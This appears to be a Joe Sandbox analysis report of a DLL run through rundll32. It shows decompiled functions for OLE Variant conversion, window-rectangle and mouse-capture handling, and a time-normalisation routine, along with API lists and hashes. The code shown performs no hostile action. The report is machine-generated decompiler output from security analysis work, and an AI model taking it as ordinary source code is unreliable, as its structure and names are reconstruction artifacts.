                                                                                                            				 *(_t327 - 0x30) = 0;
                                                                                                            				E10010592(_t327 - 0x40);
                                                                                                            				_t321 =  *((intOrPtr*)(__ecx + 0x54));
                                                                                                            				 *((intOrPtr*)(_t327 - 4)) = 0;
                                                                                                            				E1000C8EB( *((intOrPtr*)(__ecx + 0x54)), __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x28);
                                                                                                            				_t333 =  *((intOrPtr*)(_t327 - 0x28)) - 3;
                                                                                                            				if( *((intOrPtr*)(_t327 - 0x28)) == 3 || E1000B5EA(_t321, _t333,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x26) == 0) {
                                                                                                            					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                                                            					__imp__#9(_t327 - 0x40);
                                                                                                            				} else {
                                                                                                            					_t167 =  *(_t327 - 0x26) & 0x0000ffff;
                                                                                                            					_t326 = __imp__#9;
                                                                                                            					__eflags = _t167 - 0x81;
                                                                                                            					if(__eflags > 0) {
                                                                                                            						_t168 = _t167 - 0x82;
                                                                                                            						__eflags = _t168;
                                                                                                            						if(__eflags == 0) {
                                                                                                            							goto L47;
                                                                                                            						} else {
                                                                                                            							_t181 = _t168 - 1;
                                                                                                            							__eflags = _t181;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								_t183 = E1000C669(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                                                            								__eflags = _t183;
                                                                                                            								if(_t183 != 0) {
                                                                                                            									__eflags =  *(_t327 - 0x23);
                                                                                                            									asm("fild qword [ebp-0x21]");
                                                                                                            									if( *(_t327 - 0x23) > 0) {
                                                                                                            										do {
                                                                                                            											_t129 = _t327 - 0x23;
                                                                                                            											 *_t129 =  *(_t327 - 0x23) - 1;
                                                                                                            											__eflags =  *_t129;
                                                                                                            											_t335 = _t335 *  *0x10040908;
                                                                                                            										} while ( *_t129 != 0);
                                                                                                            									}
                                                                                                            									__eflags =  *(_t327 - 0x22);
                                                                                                            									if( *(_t327 - 0x22) == 0) {
                                                                                                            										_t335 = st0;
                                                                                                            										asm("fchs");
                                                                                                            										st1 = _t335;
                                                                                                            									}
                                                                                                            									 *(_t327 - 0x78) = _t335;
                                                                                                            									 *((short*)(_t327 - 0x80)) = 5;
                                                                                                            									 *((char*)(_t327 - 4)) = 0xe;
                                                                                                            									E10010578(_t327 - 0x80, _t327 - 0x40, _t327 - 0x80);
                                                                                                            									_t186 = _t327 - 0x80;
                                                                                                            									goto L36;
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								_t189 = _t181;
                                                                                                            								__eflags = _t189;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t191 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                                                            									__eflags = _t191;
                                                                                                            									if(_t191 != 0) {
                                                                                                            										asm("fldz");
                                                                                                            										 *(_t327 - 0x20) = _t335;
                                                                                                            										 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                                                            										E1000B521(_t327 - 0x20,  *(_t327 - 0x30),  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff, 0, 0, 0);
                                                                                                            										 *((short*)(_t327 - 0x70)) = 7;
                                                                                                            										 *(_t327 - 0x68) =  *(_t327 - 0x20);
                                                                                                            										 *((char*)(_t327 - 4)) = 0xf;
                                                                                                            										E10010578(_t327 - 0x70, _t327 - 0x40, _t327 - 0x70);
                                                                                                            										_t186 = _t327 - 0x70;
                                                                                                            										goto L36;
                                                                                                            									}
                                                                                                            								} else {
                                                                                                            									_t196 = _t189 - 1;
                                                                                                            									__eflags = _t196;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t198 = E1000C693(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x30);
                                                                                                            										__eflags = _t198;
                                                                                                            										if(_t198 != 0) {
                                                                                                            											asm("fldz");
                                                                                                            											 *(_t327 - 0x20) = _t335;
                                                                                                            											 *((intOrPtr*)(_t327 - 0x18)) = 0;
                                                                                                            											E1000B582( *(_t327 - 0x30) & 0x0000ffff,  *(_t327 - 0x2e) & 0x0000ffff,  *(_t327 - 0x2c) & 0x0000ffff);
                                                                                                            											 *((short*)(_t327 - 0xb0)) = 7;
                                                                                                            											 *(_t327 - 0xa8) =  *(_t327 - 0x20);
                                                                                                            											 *((char*)(_t327 - 4)) = 0x10;
                                                                                                            											E10010578(_t327 - 0xb0, _t327 - 0x40, _t327 - 0xb0);
                                                                                                            											_t186 = _t327 - 0xb0;
                                                                                                            											goto L36;
                                                                                                            										}
                                                                                                            									} else {
                                                                                                            										__eflags = _t196 - 1;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											_t207 = E1000C6BD(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)), _t327 - 0x24);
                                                                                                            											__eflags = _t207;
                                                                                                            											if(_t207 != 0) {
                                                                                                            												_t214 = E1000C853(_t327 - 0x13c,  *((short*)(_t327 - 0x24)),  *(_t327 - 0x22) & 0x0000ffff,  *(_t327 - 0x20) & 0x0000ffff,  *(_t327 - 0x1e) & 0x0000ffff,  *(_t327 - 0x1c) & 0x0000ffff,  *(_t327 - 0x1a) & 0x0000ffff);
                                                                                                            												 *((short*)(_t327 - 0xa0)) = 7;
                                                                                                            												 *((long long*)(_t327 - 0x98)) =  *_t214;
                                                                                                            												 *((char*)(_t327 - 4)) = 0x11;
                                                                                                            												E10010578(_t327 - 0xa0, _t327 - 0x40, _t327 - 0xa0);
                                                                                                            												_t186 = _t327 - 0xa0;
                                                                                                            												goto L36;
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					} else {
                                                                                                            						if(__eflags == 0) {
                                                                                                            							_t218 = E10006B11(_t327 + 0xc, __eflags);
                                                                                                            							 *((char*)(_t327 - 4)) = 2;
                                                                                                            							_t220 = E100105C5(_t327 - 0x120,  *_t218, 8);
                                                                                                            							 *((char*)(_t327 - 4)) = 3;
                                                                                                            							E10010578(_t220, _t327 - 0x40, _t220);
                                                                                                            							 *_t326(_t327 - 0x120, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            							_t276 =  *((intOrPtr*)(_t327 + 0xc));
                                                                                                            							goto L48;
                                                                                                            						} else {
                                                                                                            							__eflags = _t167 - 8;
                                                                                                            							if(__eflags > 0) {
                                                                                                            								__eflags = _t167 - 0xb;
                                                                                                            								if(__eflags == 0) {
                                                                                                            									_t226 = E100104C1(_t327 - 0x100,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 0xb);
                                                                                                            									 *((char*)(_t327 - 4)) = 0xb;
                                                                                                            									E10010578(_t226, _t327 - 0x40, _t226);
                                                                                                            									_t186 = _t327 - 0x100;
                                                                                                            									goto L36;
                                                                                                            								} else {
                                                                                                            									__eflags = _t167 - 0xc;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										_t229 = E100105A5(_t327 - 0xf0, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            										 *((char*)(_t327 - 4)) = 1;
                                                                                                            										E10010578(_t229, _t327 - 0x40, _t229);
                                                                                                            										_t186 = _t327 - 0xf0;
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										__eflags = _t167 - 0xf;
                                                                                                            										if(_t167 > 0xf) {
                                                                                                            											__eflags = _t167 - 0x11;
                                                                                                            											if(__eflags <= 0) {
                                                                                                            												_t231 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                                                            												 *((short*)(_t327 - 0x60)) = 0x11;
                                                                                                            												 *((char*)(_t327 - 0x58)) =  *_t231;
                                                                                                            												 *((char*)(_t327 - 4)) = 6;
                                                                                                            												E10010578(_t327 - 0x60, _t327 - 0x40, _t327 - 0x60);
                                                                                                            												_t186 = _t327 - 0x60;
                                                                                                            												goto L36;
                                                                                                            											} else {
                                                                                                            												__eflags = _t167 - 0x12;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													goto L24;
                                                                                                            												} else {
                                                                                                            													__eflags = _t167 - 0x13;
                                                                                                            													if(__eflags == 0) {
                                                                                                            														goto L23;
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							} else {
                                                                                                            								if(__eflags == 0) {
                                                                                                            									L47:
                                                                                                            									_t170 = E1000E754(_t327 - 0x28, __eflags);
                                                                                                            									 *((char*)(_t327 - 4)) = 4;
                                                                                                            									_t172 = E100105C5(_t327 - 0x130,  *_t170, 8);
                                                                                                            									 *((char*)(_t327 - 4)) = 5;
                                                                                                            									E10010578(_t172, _t327 - 0x40, _t172);
                                                                                                            									 *_t326(_t327 - 0x130, E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))));
                                                                                                            									_t276 =  *((intOrPtr*)(_t327 - 0x28));
                                                                                                            									L48:
                                                                                                            									__eflags = _t276 + 0xfffffff0;
                                                                                                            									 *((char*)(_t327 - 4)) = 0;
                                                                                                            									E100014B0(_t276 + 0xfffffff0, _t318);
                                                                                                            								} else {
                                                                                                            									_t243 = _t167;
                                                                                                            									__eflags = _t243;
                                                                                                            									if(__eflags == 0) {
                                                                                                            										L24:
                                                                                                            										_t237 = E100104C1(_t327 - 0x110,  *((short*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 2);
                                                                                                            										 *((char*)(_t327 - 4)) = 7;
                                                                                                            										E10010578(_t237, _t327 - 0x40, _t237);
                                                                                                            										_t186 = _t327 - 0x110;
                                                                                                            										goto L36;
                                                                                                            									} else {
                                                                                                            										_t244 = _t243 - 1;
                                                                                                            										__eflags = _t244;
                                                                                                            										if(__eflags == 0) {
                                                                                                            											L23:
                                                                                                            											_t240 = E100104E8(_t327 - 0xe0,  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc))))), 3);
                                                                                                            											 *((char*)(_t327 - 4)) = 8;
                                                                                                            											E10010578(_t240, _t327 - 0x40, _t240);
                                                                                                            											_t186 = _t327 - 0xe0;
                                                                                                            											goto L36;
                                                                                                            										} else {
                                                                                                            											_t245 = _t244 - 1;
                                                                                                            											__eflags = _t245;
                                                                                                            											if(__eflags == 0) {
                                                                                                            												 *((intOrPtr*)(_t327 - 0xb8)) =  *((intOrPtr*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            												 *((short*)(_t327 - 0xc0)) = 4;
                                                                                                            												 *((char*)(_t327 - 4)) = 9;
                                                                                                            												E10010578(_t327 - 0xc0, _t327 - 0x40, _t327 - 0xc0);
                                                                                                            												_t186 = _t327 - 0xc0;
                                                                                                            												goto L36;
                                                                                                            											} else {
                                                                                                            												_t249 = _t245 - 1;
                                                                                                            												__eflags = _t249;
                                                                                                            												if(__eflags == 0) {
                                                                                                            													 *((long long*)(_t327 - 0x88)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            													 *((short*)(_t327 - 0x90)) = 5;
                                                                                                            													 *((char*)(_t327 - 4)) = 0xa;
                                                                                                            													E10010578(_t327 - 0x90, _t327 - 0x40, _t327 - 0x90);
                                                                                                            													_t186 = _t327 - 0x90;
                                                                                                            													goto L36;
                                                                                                            												} else {
                                                                                                            													_t253 = _t249 - 1;
                                                                                                            													__eflags = _t253;
                                                                                                            													if(__eflags == 0) {
                                                                                                            														_t254 = E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)));
                                                                                                            														 *((short*)(_t327 - 0x50)) = 6;
                                                                                                            														 *((intOrPtr*)(_t327 - 0x48)) =  *_t254;
                                                                                                            														 *((intOrPtr*)(_t327 - 0x44)) =  *((intOrPtr*)(_t254 + 4));
                                                                                                            														 *((char*)(_t327 - 4)) = 0xd;
                                                                                                            														E10010578(_t327 - 0x50, _t327 - 0x40, _t327 - 0x50);
                                                                                                            														_t186 = _t327 - 0x50;
                                                                                                            														goto L36;
                                                                                                            													} else {
                                                                                                            														__eflags = _t253 - 1;
                                                                                                            														if(__eflags == 0) {
                                                                                                            															 *((long long*)(_t327 - 0xc8)) =  *((long long*)(E1000B61E(_t321, __eflags,  *((intOrPtr*)(_t327 + 0xc)))));
                                                                                                            															 *((short*)(_t327 - 0xd0)) = 7;
                                                                                                            															 *((char*)(_t327 - 4)) = 0xc;
                                                                                                            															E10010578(_t327 - 0xd0, _t327 - 0x40, _t327 - 0xd0);
                                                                                                            															_t186 = _t327 - 0xd0;
                                                                                                            															L36:
                                                                                                            															 *((char*)(_t327 - 4)) = 0;
                                                                                                            															 *_t326(_t186);
                                                                                                            														}
                                                                                                            													}
                                                                                                            												}
                                                                                                            											}
                                                                                                            										}
                                                                                                            									}
                                                                                                            								}
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            					E100105A5( *((intOrPtr*)(_t327 + 8)), _t327 - 0x40);
                                                                                                            					 *_t326(_t327 - 0x40);
                                                                                                            				}
                                                                                                            				 *[fs:0x0] =  *((intOrPtr*)(_t327 - 0xc));
                                                                                                            				return E100117AE( *((intOrPtr*)(_t327 + 8)),  *((intOrPtr*)(_t327 - 0x10)));
                                                                                                            			}




































                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 1000ECED
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000ED4F
                                                                                                            • VariantClear.OLEAUT32(00000007), ref: 1000F07D
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1F2
                                                                                                              • Part of subcall function 10010578: VariantCopy.OLEAUT32(?,?), ref: 10010580
                                                                                                              • Part of subcall function 1000B521: SystemTimeToVariantTime.OLEAUT32(?), ref: 1000B56F
                                                                                                            • VariantClear.OLEAUT32(?), ref: 1000F1D2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2075586698-0
                                                                                                            • Opcode ID: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction ID: ab9c67d837f040e6a8d2bcef4c04a3746811f2ad7d73440ecc3fc71fc0b20bfc
                                                                                                            • Opcode Fuzzy Hash: 3b0dce7884382fabb55a61a888d308d26afc35592f5d1fc6c1dc89f667979746
                                                                                                            • Instruction Fuzzy Hash: 3FE16D74D0055CEAEF15DBA0C890AFEB7B9FF08380F04409AF845A7195DB74AE49EB61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                              • Part of subcall function 100304C6: PeekMessageA.USER32(0000000F,00000000,0000000F,0000000F,00000000), ref: 10030507
                                                                                                              • Part of subcall function 100304C6: SetRectEmpty.USER32(?), ref: 10030528
                                                                                                              • Part of subcall function 100304C6: GetDesktopWindow.USER32 ref: 10030540
                                                                                                              • Part of subcall function 100304C6: LockWindowUpdate.USER32(?,00000000), ref: 10030551
                                                                                                              • Part of subcall function 100304C6: GetDCEx.USER32(?,00000000,00000003), ref: 10030568
                                                                                                              • Part of subcall function 10028B90: GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                                                              • Part of subcall function 10028B90: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                                                            • GetWindowRect.USER32 ref: 10030BDC
                                                                                                              • Part of subcall function 10028BC6: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                                                              • Part of subcall function 10028BC6: GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                                                            • GetWindowRect.USER32 ref: 10030CA6
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030D5E
                                                                                                              • Part of subcall function 1003033B: OffsetRect.USER32(?,?,?), ref: 10030372
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030704
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003070F
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 1003071A
                                                                                                              • Part of subcall function 100306DB: OffsetRect.USER32(?,?,?), ref: 10030725
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030A88
                                                                                                              • Part of subcall function 10030A77: SetCapture.USER32(?), ref: 10030A98
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030AA4
                                                                                                              • Part of subcall function 10030A77: GetMessageA.USER32 ref: 10030ABE
                                                                                                              • Part of subcall function 10030A77: DispatchMessageA.USER32 ref: 10030AF0
                                                                                                              • Part of subcall function 10030A77: GetCapture.USER32 ref: 10030B4E
                                                                                                            • GetWindowRect.USER32 ref: 10030D79
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E61
                                                                                                            • InflateRect.USER32(?,00000002,00000002), ref: 10030E74
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$OffsetWindow$Capture$InflateMessage$AddressHandleModuleProc$DesktopDispatchEmptyLockPeekUpdate
                                                                                                            • String ID:
                                                                                                            • API String ID: 2136250054-0
                                                                                                            • Opcode ID: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction ID: 4b2599bdc0df74788382724407d7fba24e161278d0237bedf51c9f418cb1fd08
                                                                                                            • Opcode Fuzzy Hash: 6d32121b4750971a1268de3c02b9dbf9a02096f53d5083c77dbf25d0c75ce957
                                                                                                            • Instruction Fuzzy Hash: E3B14876901618AFCF01CFA4C891DEE7BBAEF4A311F014594FD05AF256D672AE84CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E100134E7(void* __ecx, intOrPtr __edx, intOrPtr* _a4) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v12;
                                                                                                            				void* __ebx;
                                                                                                            				void* __edi;
                                                                                                            				void* __esi;
                                                                                                            				void* __ebp;
                                                                                                            				intOrPtr _t62;
                                                                                                            				intOrPtr* _t63;
                                                                                                            				intOrPtr* _t65;
                                                                                                            				intOrPtr _t67;
                                                                                                            				intOrPtr _t68;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				void* _t72;
                                                                                                            				intOrPtr _t74;
                                                                                                            				char _t75;
                                                                                                            				intOrPtr _t79;
                                                                                                            				intOrPtr _t85;
                                                                                                            				intOrPtr _t86;
                                                                                                            				intOrPtr _t90;
                                                                                                            				intOrPtr* _t92;
                                                                                                            				intOrPtr _t94;
                                                                                                            				intOrPtr _t101;
                                                                                                            				intOrPtr _t102;
                                                                                                            				char _t105;
                                                                                                            				signed int _t111;
                                                                                                            				intOrPtr _t113;
                                                                                                            				intOrPtr _t118;
                                                                                                            				intOrPtr* _t121;
                                                                                                            				void* _t127;
                                                                                                            				intOrPtr _t128;
                                                                                                            				intOrPtr* _t129;
                                                                                                            				intOrPtr _t132;
                                                                                                            				void* _t134;
                                                                                                            				intOrPtr _t136;
                                                                                                            				intOrPtr _t138;
                                                                                                            
                                                                                                            				_t118 = __edx;
                                                                                                            				_t121 = _a4;
                                                                                                            				_t101 =  *((intOrPtr*)(_t121 + 4));
                                                                                                            				_t62 =  *_t121;
                                                                                                            				_t132 = _t101;
                                                                                                            				if(_t132 < 0 || _t132 <= 0 && _t62 < 0) {
                                                                                                            					L29:
                                                                                                            					_t63 = 0;
                                                                                                            					__eflags = 0;
                                                                                                            					goto L30;
                                                                                                            				} else {
                                                                                                            					_t134 = _t101 - 0x1000;
                                                                                                            					if(_t134 > 0) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					if(_t134 < 0) {
                                                                                                            						L6:
                                                                                                            						_push(_t127);
                                                                                                            						E100193FB(_t127, _t135);
                                                                                                            						_t102 =  *((intOrPtr*)(_t121 + 4));
                                                                                                            						_t136 = _t102;
                                                                                                            						_t128 =  *_t121;
                                                                                                            						if(_t136 < 0 || _t136 <= 0 && _t128 <= 0x3f480) {
                                                                                                            							_t65 = E10018BEF(_t121);
                                                                                                            							__eflags =  *0x1004cdec; // 0x1
                                                                                                            							_t129 = _t65;
                                                                                                            							if(__eflags == 0) {
                                                                                                            								L15:
                                                                                                            								asm("cdq");
                                                                                                            								_t67 =  *0x1004cde8; // 0x7080
                                                                                                            								_t123 = _t118;
                                                                                                            								asm("cdq");
                                                                                                            								_t105 =  *_t129 - _t67;
                                                                                                            								__eflags = _t105;
                                                                                                            								asm("sbb edi, edx");
                                                                                                            								_v12 = _t105;
                                                                                                            								_v8 = _t118;
                                                                                                            								L16:
                                                                                                            								_t68 = E10019490(_t105, _t123, 0x3c, 0);
                                                                                                            								__eflags = _t68;
                                                                                                            								 *_t129 = _t68;
                                                                                                            								if(_t68 < 0) {
                                                                                                            									 *_t129 = _t68 + 0x3c;
                                                                                                            									_v12 = _v12 + 0xffffffc4;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t69 = E10013780(_v12, _v8, 0x3c, 0);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edi, edx");
                                                                                                            								_v12 = _t69 +  *((intOrPtr*)(_t129 + 4));
                                                                                                            								_v8 = _t118;
                                                                                                            								_t71 = E10019490(_t69 +  *((intOrPtr*)(_t129 + 4)), _t118, 0x3c, 0);
                                                                                                            								__eflags = _t71;
                                                                                                            								 *((intOrPtr*)(_t129 + 4)) = _t71;
                                                                                                            								if(_t71 < 0) {
                                                                                                            									 *((intOrPtr*)(_t129 + 4)) = _t71 + 0x3c;
                                                                                                            									_v12 = _v12 + 0xffffffc4;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t72 = E10013780(_v12, _v8, 0x3c, 0);
                                                                                                            								asm("cdq");
                                                                                                            								asm("adc edi, edx");
                                                                                                            								_v12 = _t72 +  *((intOrPtr*)(_t129 + 8));
                                                                                                            								_v8 = _t118;
                                                                                                            								_t74 = E10019490(_t72 +  *((intOrPtr*)(_t129 + 8)), _t118, 0x18, 0);
                                                                                                            								__eflags = _t74;
                                                                                                            								 *((intOrPtr*)(_t129 + 8)) = _t74;
                                                                                                            								if(_t74 < 0) {
                                                                                                            									 *((intOrPtr*)(_t129 + 8)) = _t74 + 0x18;
                                                                                                            									_v12 = _v12 + 0xffffffe8;
                                                                                                            									asm("adc dword [ebp-0x4], 0xffffffff");
                                                                                                            								}
                                                                                                            								_t75 = E10013780(_v12, _v8, 0x18, 0);
                                                                                                            								__eflags = _t118;
                                                                                                            								_v12 = _t75;
                                                                                                            								_v8 = _t118;
                                                                                                            								if(__eflags > 0) {
                                                                                                            									goto L28;
                                                                                                            								} else {
                                                                                                            									if(__eflags < 0) {
                                                                                                            										L25:
                                                                                                            										asm("cdq");
                                                                                                            										_t111 = 7;
                                                                                                            										 *(_t129 + 0x18) = ( *(_t129 + 0x18) + _t75 + 7) % _t111;
                                                                                                            										 *((intOrPtr*)(_t129 + 0xc)) =  *((intOrPtr*)(_t129 + 0xc)) + _v12;
                                                                                                            										_t79 =  *((intOrPtr*)(_t129 + 0xc));
                                                                                                            										__eflags = _t79;
                                                                                                            										if(_t79 > 0) {
                                                                                                            											_t60 = _t129 + 0x1c;
                                                                                                            											 *_t60 =  *((intOrPtr*)(_t129 + 0x1c)) + _v12;
                                                                                                            											__eflags =  *_t60;
                                                                                                            										} else {
                                                                                                            											 *((intOrPtr*)(_t129 + 0x14)) =  *((intOrPtr*)(_t129 + 0x14)) - 1;
                                                                                                            											 *((intOrPtr*)(_t129 + 0xc)) = _t79 + 0x1f;
                                                                                                            											 *((intOrPtr*)(_t129 + 0x1c)) = 0x16c;
                                                                                                            											 *((intOrPtr*)(_t129 + 0x10)) = 0xb;
                                                                                                            										}
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									__eflags = _t75;
                                                                                                            									if(_t75 >= 0) {
                                                                                                            										goto L28;
                                                                                                            									}
                                                                                                            									goto L25;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							_push(_t129);
                                                                                                            							_t85 = E10019447(0, _t121, _t129, __eflags);
                                                                                                            							__eflags = _t85;
                                                                                                            							if(_t85 == 0) {
                                                                                                            								goto L15;
                                                                                                            							}
                                                                                                            							_t113 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            							_t86 =  *0x1004cde8; // 0x7080
                                                                                                            							asm("cdq");
                                                                                                            							asm("cdq");
                                                                                                            							asm("sbb edx, edi");
                                                                                                            							_v12 =  *_t129 - _t86 + _t113;
                                                                                                            							_v8 = _t118;
                                                                                                            							 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                                                            							_t123 = _v8;
                                                                                                            							_t105 = _v12;
                                                                                                            							goto L16;
                                                                                                            						} else {
                                                                                                            							_t90 =  *0x1004cde8; // 0x7080
                                                                                                            							asm("cdq");
                                                                                                            							asm("sbb ecx, edx");
                                                                                                            							_v12 = _t128 - _t90;
                                                                                                            							_v8 = _t102;
                                                                                                            							_t92 = E10018BEF( &_v12);
                                                                                                            							_t138 =  *0x1004cdec; // 0x1
                                                                                                            							_t129 = _t92;
                                                                                                            							if(_t138 != 0) {
                                                                                                            								_push(_t129);
                                                                                                            								if(E10019447(0, _t121, _t129, _t138) != 0) {
                                                                                                            									_t94 =  *0x1004cdf0; // 0xfffff1f0
                                                                                                            									asm("cdq");
                                                                                                            									_v12 = _v12 - _t94;
                                                                                                            									asm("sbb [ebp-0x4], edx");
                                                                                                            									_t129 = E10018BEF( &_v12);
                                                                                                            									 *((intOrPtr*)(_t129 + 0x20)) = 1;
                                                                                                            								}
                                                                                                            							}
                                                                                                            							L28:
                                                                                                            							_t63 = _t129;
                                                                                                            							L30:
                                                                                                            							return _t63;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t135 = _t62;
                                                                                                            					if(_t62 > 0) {
                                                                                                            						goto L29;
                                                                                                            					}
                                                                                                            					goto L6;
                                                                                                            				}
                                                                                                            			}








































                                                                                                            APIs
                                                                                                              • Part of subcall function 10018BEF: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                                                            • __allrem.LIBCMT ref: 100135FA
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001361B
                                                                                                            • __allrem.LIBCMT ref: 10013637
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 1001365A
                                                                                                            • __allrem.LIBCMT ref: 10013676
                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10013699
                                                                                                              • Part of subcall function 10019447: __lock.LIBCMT ref: 10019455
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$__allrem$__lock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1282128132-0
